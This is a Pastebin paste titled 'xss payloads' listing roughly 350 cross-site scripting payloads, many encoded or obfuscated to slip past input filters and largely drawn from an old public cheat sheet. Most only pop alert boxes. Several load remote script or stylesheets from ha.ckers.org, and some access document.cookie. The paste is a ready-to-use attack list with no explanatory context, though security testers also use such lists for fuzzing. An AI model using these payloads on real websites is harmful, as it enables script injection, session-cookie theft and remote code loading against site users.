API tools faq
paste
Advertisement
Guest User

xss payloads

a guest
Jan 25th, 2016
397
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 44.29 KB | None | 0 0
raw download clone embed print report
  1. %22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
  2. ';alert(String.fromCharCode(888383))//\';alert(String.fromCharCode(888383))//\";alert(String.fromCharCode(888383))//\";alert(String.fromCharCode(888383))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(888383))</SCRIPT>"
  3. '';!--\"<XSS>=&{()}"
  4. <IMG SRC=\"javascript:alert('XSS');\">"
  5. <IMG SRC=javascript:alert('XSS')>"
  6. <IMG SRC=JaVaScRiPt:alert('XSS')>"
  7. <IMG SRC=javascript:alert(&quot;XSS&quot;)>"
  8. <IMG SRC=`javascript:alert(\"is this 'XSS'\")`>"
  9. <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">"
  10. <IMG SRC=javascript:alert(String.fromCharCode(888383))>"
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">"
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">"
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">"
  14. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out"
  15. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out"
  16. <IMG SRC=\"  javascript:alert('XSS');\">"
  17. <BODY onload!#$%&()*~+-_.:;?@[/|\]^`=alert(\"XSS\")>"
  18. <<SCRIPT>alert(\"XSS\");//<</SCRIPT>"
  19. <IMG SRC=\"javascript:alert('XSS')\""
  20. <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>"
  21. \";alert('XSS');//"
  22. </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>"
  23. <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">"
  24. <BODY BACKGROUND=\"javascript:alert('XSS')\">"
  25. <BODY ONLOAD=alert('XSS')>"
  26. <IMG DYNSRC=\"javascript:alert('XSS')\">"
  27. <IMG LOWSRC=\"javascript:alert('XSS')\">"
  28. <BGSOUND SRC=\"javascript:alert('XSS');\">"
  29. <BR SIZE=\"&{alert('XSS')}\">"
  30. <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">"
  31. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS"
  32. <IMG SRC='vbscript:msgbox(\"XSS\")'>"
  33. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">"
  34. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">"
  35. <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>"
  36. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>"
  37. <TABLE BACKGROUND=\"javascript:alert('XSS')\">"
  38. <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">"
  39. <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">"
  40. <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">"
  41. <DIV STYLE=\"width: expression(alert('XSS'));\">"
  42. <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>"
  43. <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">"
  44. <XSS STYLE=\"xss:expression(alert('XSS'))\">"
  45. <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>"
  46. <BASE HREF=\"javascript:alert('XSS');//\">"
  47. <? echo('<SCR)'; echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>"
  48. <A HREF=\"http://1113982867/\">XSS</A>"
  49. <A HREF=\"http://www.google.com./\">XSS</A>"
  50. %22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E"
  51. 1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E"
  52. <script>alert('xssya')</script>"
  53. %3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"
  54. <scr<script>ipt>alert(1)</scr<script>ipt>"
  55. %3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e"
  56. %3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit"
  57. %3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a"
  58. %3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e"
  59. <iframesrc=\"javascript:alert(2)\">"
  60. <iframe/src=\"data:text&sol;html;&Tab;base64&NewLine;PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">"
  61. <form action=\"Javascript:alert(1)\"><input type=submit>"
  62. <isindex action=data:text/html type=image>"
  63. <object data=\"data:text/html;base64PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">"
  64. <svg/onload=prompt(1);>"
  65. <marquee/onstart=confirm(2)>/"
  66. <body onload=prompt(1);>"
  67. <q/oncut=open()>"
  68. <a onmouseover=location=�javascript:alert(1)>click"
  69. <svg><script>alert&#40/1/&#41</script>"
  70. &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;"
  71. <scri%00pt>alert(1);</scri%00pt>"
  72. <scri%00pt>confirm(0);</scri%00pt>"
  73. 5\x72\x74\x28\x30\x29\x3B'>rhainfosec"
  74. <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>"
  75. <marquee/onstart=confirm(2)>"
  76. <A HREF=\"http://www.google.com./\">XSS</A>"
  77. <svg/onload=prompt(1);>
  78. <script>alert(123)</script>
  79. <script>alert("hellox worldss");</script>
  80. javascript:alert("hellox worldss")
  81. <img src="javascript:alert('XSS');">
  82. <img src=javascript:alert(&quot;XSS&quot;)>
  83. <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  84. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  85. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  86. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  87. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  88. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  89. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  90. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  91. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  92. <<SCRIPT>alert("XSS");//<</SCRIPT>
  93. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  94. <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  95. <script>alert("XSS");</script>&search=1
  96. 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  97. <h1><font color=blue>hellox worldss</h1>
  98. <BODY ONLOAD=alert('hellox worldss')>
  99. <input onfocus=write(XSS) autofocus>
  100. <input onblur=write(XSS) autofocus><input autofocus>
  101. <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  102. <form><button formaction="javascript:alert(XSS)">lol
  103. <!--<img src="--><img src=x onerror=alert(XSS)//">
  104. <![><img src="]><img src=x onerror=alert(XSS)//">
  105. <style><img src="</style><img src=x onerror=alert(XSS)//">
  106. <? foo="><script>alert(1)</script>">
  107. <! foo="><script>alert(1)</script>">
  108. </ foo="><script>alert(1)</script>">
  109. <? foo="><x foo='?><script>alert(1)</script>'>">
  110. <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
  111. <% foo><x foo="%><script>alert(123)</script>">
  112. <div style="font-family:'foo&#10;;color:red;';">LOL
  113. LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
  114. <script>({0:#0=alert/#0#/#0#(0)})</script>
  115. <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
  116. &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
  117. \\";alert('XSS');//
  118. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
  119. &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
  120. &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  121. &lt;BODY ONLOAD=alert('XSS')&gt;
  122. &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
  123. &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
  124. &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
  125. &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
  126. &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
  127. &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
  128. &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
  129. &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
  130. &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
  131. &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
  132. &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
  133. &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  134. &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
  135. &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
  136. &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
  137. �scriptualert(EXSSE)�/scriptu
  138. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
  139. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
  140. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"
  141. &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
  142. &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;
  143. &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  144. &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  145. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  146. &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;
  147. &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
  148. &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;
  149. &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;
  150. &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;
  151. exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
  152. xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
  153. &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
  154. &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  155. &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;
  156. &lt;!--&#91;if gte IE 4&#93;&gt;
  157. &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
  158. &lt;!&#91;endif&#93;--&gt;
  159. &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;
  160. &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;
  161. &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
  162. &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  163. &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  164. a=\"get\";
  165. b=\"URL(\\"\";
  166. c=\"javascript&#058;\";
  167. d=\"alert('XSS');\\")\";
  168. eval(a+b+c+d);
  169. &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
  170. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;
  171. &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  172. &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  173. &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
  174. &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
  175. &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  176. &lt;HTML&gt;&lt;BODY&gt;
  177. &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;
  178. &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
  179. &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
  180. &lt;/BODY&gt;&lt;/HTML&gt;
  181. &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;
  182. &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;
  183. &lt;? echo('&lt;SCR)';
  184. echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
  185. &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;
  186. Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
  187. &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
  188. &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  189. &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  190. &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  191. &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  192. &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  193. &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  194. &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  195. &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  196. &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;
  197. &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
  198. &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;
  199. &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;
  200. &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;
  201. &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;
  202. &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;
  203. &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
  204. &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;
  205. &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;
  206. &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;
  207. &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;
  208. &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;
  209. &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;
  210. &lt;
  211. %3C
  212. &lt
  213. &LT
  214. &LT;
  215. &#60
  216. &#060
  217. &#0060
  218. &#00060
  219. &#000060
  220. &#0000060
  221. &#x3c
  222. &#x03c
  223. &#x003c
  224. &#x0003c
  225. &#x00003c
  226. &#x000003c
  227. &#x3c;
  228. &#x03c;
  229. &#x003c;
  230. &#x0003c;
  231. &#x00003c;
  232. &#x000003c;
  233. &#X3c
  234. &#X03c
  235. &#X003c
  236. &#X0003c
  237. &#X00003c
  238. &#X000003c
  239. &#X3c;
  240. &#X03c;
  241. &#X003c;
  242. &#X0003c;
  243. &#X00003c;
  244. &#X000003c;
  245. &#x3C
  246. &#x03C
  247. &#x003C
  248. &#x0003C
  249. &#x00003C
  250. &#x000003C
  251. &#x3C;
  252. &#x03C;
  253. &#x003C;
  254. &#x0003C;
  255. &#x00003C;
  256. &#x000003C;
  257. &#X3C
  258. &#X03C
  259. &#X003C
  260. &#X0003C
  261. &#X00003C
  262. &#X000003C
  263. &#X3C;
  264. &#X03C;
  265. &#X003C;
  266. &#X0003C;
  267. &#X00003C;
  268. &#X000003C;
  269. \x3c
  270. \x3C
  271. \u003c
  272. \u003C
  273. &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
  274. &lt;IMG SRC=\"javascript&#058;alert('XSS')\"
  275. &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
  276. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
  277. &lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
  278. &lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  279. &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;
  280. &lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  281. &lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt;
  282. perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
  283. perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out
  284. &lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;
  285. &lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;
  286. &lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;
  287. &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
  288. &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
  289. &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  290. &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
  291. &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
  292. &lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
  293. &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
  294. &lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
  295. &lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
  296. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
  297. '';!--\"&lt;XSS&gt;=&{()}
  298. ';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  299. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  300. '';!--"<XSS>=&{()}
  301. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  302. <IMG SRC="javascript:alert('XSS');">
  303. <IMG SRC=javascript:alert('XSS')>
  304. <IMG SRC=javascrscriptipt:alert('XSS')>
  305. <IMG SRC=JaVaScRiPt:alert('XSS')>
  306. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  307. <IMG SRC=" &#14; javascript:alert('XSS');">
  308. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  309. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  310. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  311. \";alert('XSS');//
  312. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  313. �script�alert(�XSS�)�/script�
  314. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  315. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  316. <TABLE BACKGROUND="javascript:alert('XSS')">
  317. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  318. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  319. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  320. <DIV STYLE="width: expression(alert('XSS'));">
  321. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  322. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  323. <XSS STYLE="xss:expression(alert('XSS'))">
  324. exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
  325. <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
  326. a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
  327. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  328. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
  329. <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
  330. <form><button formaction="javascript:alert(123)">crosssitespt
  331. <frameset onload=alert(123)>
  332. <!--<img src="--><img src=x onerror=alert(123)//">
  333. <style><img src="</style><img src=x onerror=alert(123)//">
  334. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  335. <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  336. <embed src="javascript:alert(1)">
  337. <script>({0:#0=alert/#0#/#0#(123)})</script>
  338. <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
  339. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
  340. <script src="#">{alert(1)}</script>;1
  341. <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
  342. <svg xmlns="#"><script>alert(1)</script></svg>
  343. <svg onload="javascript:alert(123)" xmlns="#"></svg>
  344. <iframe xmlns="#" src="javascript:alert(1)"></iframe>
  345. +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
  346. %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
  347. +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
  348. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
  349. %253cscript%253ealert(document.cookie)%253c/script%253e
  350. �><s�%2b�cript>alert(document.cookie)</script>
  351. �><ScRiPt>alert(document.cookie)</script>
